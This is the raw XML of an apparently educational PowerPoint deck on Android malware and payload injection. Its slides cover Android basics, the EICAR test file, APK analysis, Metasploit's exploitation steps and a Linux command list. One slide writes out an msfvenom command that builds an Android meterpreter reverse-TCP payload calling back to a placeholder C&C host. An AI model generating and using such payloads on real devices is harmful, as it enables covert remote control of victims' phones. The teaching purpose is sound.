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313" r:id="rId3"/>
    <p:sldId id="316" r:id="rId4"/>
    <p:sldId id="314" r:id="rId5"/>
    <p:sldId id="315" r:id="rId6"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Anton" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId8"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Catamaran" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId9"/>
      <p:bold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4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2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40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33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17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hyperlink" Target="https://www.eicar.org/download-anti-malware-testfi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ocean.com/community/tutorials/linux-commands#the-cp-and-mv-commands" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.digitalocean.com/community/tutorials/linux-commands#the-uname-and-whoami-commands" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.digitalocean.com/community/tutorials/linux-commands#the-ifconfig-and-traceroute-commands" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.digitalocean.com/community/tutorials/linux-commands#package-managers-in-linux" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.digitalocean.com/community/tutorials/linux-commands#the-mkdir-command-in-linux" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.digitalocean.com/community/tutorials/linux-commands#the-cat-echo-and-less-commands" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.digitalocean.com/community/tutorials/linux-commands#the-chmod-and-chown-commands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digitalocean.com/community/tutorials/linux-commands#the-ssh-command-in-linux" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.digitalocean.com/community/tutorials/linux-commands#the-ufw-and-iptables-command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igitalocean.com/community/tutorials/linux-commands#the-cd-command-in-linux" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.digitalocean.com/community/tutorials/linux-commands#the-clear-command-in-linux" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.digitalocean.com/community/tutorials/linux-commands#the-passwd-command-in-linux" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.digitalocean.com/community/tutorials/linux-commands#the-pwd-command-in-linux" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.digitalocean.com/community/tutorials/linux-commands#the-grep-command-in-linux" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.digitalocean.com/community/tutorials/linux-commands#the-useradd-and-usermod-commands" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.digitalocean.com/community/tutorials/linux-commands#the-touch-command-in-linux" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.digitalocean.com/community/tutorials/linux-commands#the-wget-command-in-linux" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.digitalocean.com/community/tutorials/linux-commands#the-ls-command-in-linux" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.digitalocean.com/community/tutorials/linux-commands#the-rm-command-in-linux" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.digitalocean.com/community/tutorials/linux-commands#the-tar-zip-and-unzip-commands" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.digitalocean.com/community/tutorials/linux-commands#the-sudo-command-in-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Malware and Payload Injection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820359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 and Protection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4936" y="234009"/>
            <a:ext cx="42941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hlink"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>Android Malware Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA"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BE3B4-8616-D346-624E-93CB66D78772}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518294" y="862565"/>
            <a:ext cx="494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Why Mobile?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70F37-CBD5-6758-FBE9-84CC5D94A7C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="326059" y="1324229"/>
            <a:ext cx="4564596" cy="34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600"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod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indent="-317500">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="E76A28"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Nunito Light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indent="-317500" algn="ctr">
              <a:buClr>
                <a:srgbClr val="E76A28"/>
              </a:buClr>
              <a:buSzPts val="15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indent="-317500" algn="ctr">
              <a:buClr>
                <a:srgbClr val="E76A28"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Nunito Light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indent="-317500" algn="ctr">
              <a:buClr>
                <a:srgbClr val="E76A28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indent="-317500" algn="ctr"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indent="-317500" algn="ctr">
              <a:buClr>
                <a:srgbClr val="999999"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Nunito Light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indent="-317500" algn="ctr">
              <a:buClr>
                <a:srgbClr val="999999"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Nunito Light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indent="-317500" algn="ctr"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Mobile attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  can easily circumvent the network defenses by targeting business mobile devices. Since almost all of these devices connect to a network in one way or another, there is a pretty good chance that they will log onto the company network at some point.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What is Android Anyway?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Android </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>runs as a virtual machine (VM) “Dalvik” with a rebranded Linux flavor, designed for small devices but built for speed.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Dalvik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is Java VM with much less overhead (demand for resources)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Android is built in C++ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>as are all the libraries included in the Android Software Development Kit (SDK). This means that there is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux kernel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> underneath all that GUI fluff.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Android can run Java </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>applications inside browsers and as standalone programs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Third party programs can run native APIs to access built-in functions of Android like the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Resource Manager, Telephone Manager and other main controls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="4.0 ice cream sandwich - Device always boots in recovery mode, but  apparently there is no recovery partition - Android Enthusiasts Stack  Exchange">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4C7F92F-BAF3-B78F-E933-C2083F42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65" y="1324229"/>
            <a:ext cx="3111859" cy="274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6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3230" y="289865"/>
            <a:ext cx="2597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hlink"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>Checking Your System</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA"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70F37-CBD5-6758-FBE9-84CC5D94A7C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="312611" y="994065"/>
            <a:ext cx="3862701" cy="34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600"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod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indent="-317500">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="E76A28"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Nunito Light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indent="-317500" algn="ctr">
              <a:buClr>
                <a:srgbClr val="E76A28"/>
              </a:buClr>
              <a:buSzPts val="15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indent="-317500" algn="ctr">
              <a:buClr>
                <a:srgbClr val="E76A28"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Nunito Light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indent="-317500" algn="ctr">
              <a:buClr>
                <a:srgbClr val="E76A28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indent="-317500" algn="ctr"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indent="-317500" algn="ctr">
              <a:buClr>
                <a:srgbClr val="999999"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Nunito Light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indent="-317500" algn="ctr">
              <a:buClr>
                <a:srgbClr val="999999"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Nunito Light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indent="-317500" algn="ctr"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39700" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Testing Safeguards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EICAR - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>European Institute for Computer Anti-Virus provide a ton of resources to improve your defenses against malware. One useful bit of code is a fake virus file to test your system against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Anti-Malware Test File - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.eicar.org/download-anti-malware-testfile/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
            </a:endParaRP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</a:rPr>
              <a:t>APKAnalyser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - free tool will show you how that APK works and which APIs are called. It will also show you a very nice graphic of how that app works as a flowchart. Download </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ApkAnalyser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from the play store.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The Android Manifest is an XML file which contains important metadata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>about the Android app. This includes the package name, activity names, main activity (the entry point to the app), Android version support, hardware features support, permissions, and other configurations.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2" name="Picture 4" descr="Editing an Android Project - Dropsource Help Center">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E382335F-1593-D947-DD89-96D0F267D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188637"/>
            <a:ext cx="4673040" cy="314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70F792-FBF6-F45D-828E-9BF4D29ACCC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6192371" y="1848972"/>
            <a:ext cx="2763557" cy="618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722380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3847" y="213913"/>
            <a:ext cx="32340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hlink"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>Metasploit Payload Generator </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="2000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511B0-AB8E-C754-7C6F-9E30EF8CE91A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="622640" y="3652806"/>
            <a:ext cx="8064346" cy="1149724"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx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84539-14FB-DCF1-5F57-BF6761109DC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="560295" y="3391196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The command we’ll use</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000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93C26-E8CB-BC96-EE4A-507F544DB331}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="363410" y="868071"/>
            <a:ext cx="4239016" cy="25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600"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod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indent="-317500">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="E76A28"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Nunito Light"/>
              <a:buChar char="○"/>
              <a:defRPr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indent="-317500" algn="ctr">
              <a:buClr>
                <a:srgbClr val="E76A28"/>
              </a:buClr>
              <a:buSzPts val="15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indent="-317500" algn="ctr">
              <a:buClr>
                <a:srgbClr val="E76A28"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Nunito Light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indent="-317500" algn="ctr">
              <a:buClr>
                <a:srgbClr val="E76A28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indent="-317500" algn="ctr"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indent="-317500" algn="ctr">
              <a:buClr>
                <a:srgbClr val="999999"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Nunito Light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indent="-317500" algn="ctr">
              <a:buClr>
                <a:srgbClr val="999999"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Nunito Light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indent="-317500" algn="ctr">
              <a:buClr>
                <a:srgbClr val="999999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Metasploit Project </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is a computer security project that provides information about security vulnerabilities and aids in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>penetration testing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IDS signature development</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. It is owned by Boston, Massachusetts-based security company Rapid7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="311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The basic steps for exploiting a system include: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Checking whether the intended target system is vulnerable to an exploit.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Choosing and configuring an exploit by taking advantage of one of its bugs; about 900 different exploits for Windows, Unix/Linux and macOS systems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Choosing and configuring a payload (code that will be executed on the target system upon successful entry; for instance, a remote shell or a VNC server). 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Executing the exploit.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="What Is Metasploit | Tools &amp; Components Explained | Imperva">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E4AF0EC-10B4-0E3F-1DCA-7503C70A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79" y="718289"/>
            <a:ext cx="2981107" cy="28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E138E6-B526-A976-F4E9-E410CA60BA2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="622640" y="3783611"/>
            <a:ext cx="58304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msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0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 –help</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1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msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0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 –help  (this is the Metasploit payload generator)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:latin typeface="Catamaran"/>
              <a:cs typeface="Catamaran"/>
              <a:sym typeface="Catamaran"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1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msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0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 –payload android/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1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meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1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reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0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 LHOST=&lt;IP of C&amp;C&gt; LPORT=&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1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listeningport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0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&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Catamaran"/>
                <a:cs typeface="Catamaran"/>
                <a:sym typeface="Catamaran"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000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8320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5321" y="226119"/>
            <a:ext cx="17820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hlink"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>Cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t> Ref</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="hlink"/>
              </a:solidFill>
              <a:uFill>
                <a:noFill/>
              </a:uFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Top 50+ Linux Commands You MUST Know">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A07CFE2-058D-77C4-6729-AA650BE8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8198"/>
            <a:ext cx="3993811" cy="22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4F4BE8-BF8C-E1A7-D890-C7CFC89CF853}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="645459" y="798819"/>
            <a:ext cx="457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ls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The most frequently used command in Linux to list directories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pwd</a:t>
            </a:r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Print working directory command in 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 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Linux command to navigate through directories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mkdir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Command used to create directories in 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Move or rename files in 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Similar usage as mv but for copying files in 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Delete files or directories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touch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Create blank/empty files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Clear the terminal display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Display file contents on the terminal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echo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Print any text that follows the command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whoami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Get the active username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Command to extract and compress files in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="10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grep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Search for a string within an output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Zip files in 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unzip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Unzip files in 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ssh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Secure Shell command in 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chmod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Command to change file permissions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ifconfig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Display network interfaces and IP addresses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wget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Direct download files from the internet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iptables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Base firewall for all other firewall utilities to interface with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apt install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Package managers depending on the distribution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sudo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Command to escalate privileges in Linux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useradd</a:t>
            </a:r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n-US" sz="1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usermod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Add a new user or change existing user data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passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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- Create or update passwords for existing users</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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35380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AFAFA"/>
    </a:dk1>
    <a:lt1>
      <a:srgbClr val="0E0E0E"/>
    </a:lt1>
    <a:dk2>
      <a:srgbClr val="2E2E2E"/>
    </a:dk2>
    <a:lt2>
      <a:srgbClr val="0F0F0F"/>
    </a:lt2>
    <a:accent1>
      <a:srgbClr val="00C3DA"/>
    </a:accent1>
    <a:accent2>
      <a:srgbClr val="0B8EDA"/>
    </a:accent2>
    <a:accent3>
      <a:srgbClr val="7800DA"/>
    </a:accent3>
    <a:accent4>
      <a:srgbClr val="DA0078"/>
    </a:accent4>
    <a:accent5>
      <a:srgbClr val="FFFFFF"/>
    </a:accent5>
    <a:accent6>
      <a:srgbClr val="FFFFFF"/>
    </a:accent6>
    <a:hlink>
      <a:srgbClr val="FAFAFA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5260</TotalTime>
  <Words>695</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show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Anton</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Catamaran</vt:lpstr>
      <vt:lpstr>Nunito Light</vt:lpstr>
      <vt:lpstr>Lato</vt:lpstr>
      <vt:lpstr>Java Programming Workshop by Slidesgo</vt:lpstr>
      <vt:lpstr>Malware and Payload Injection</vt:lpstr>
      <vt:lpstr>Android Malware Vulnerabilities</vt:lpstr>
      <vt:lpstr>Checking Your System</vt:lpstr>
      <vt:lpstr>Metasploit Payload Generator </vt:lpstr>
      <vt:lpstr>Linux Cmd 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141</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-08T15:03:04Z</dcterms:modified>
</cp:coreProperties>
</file>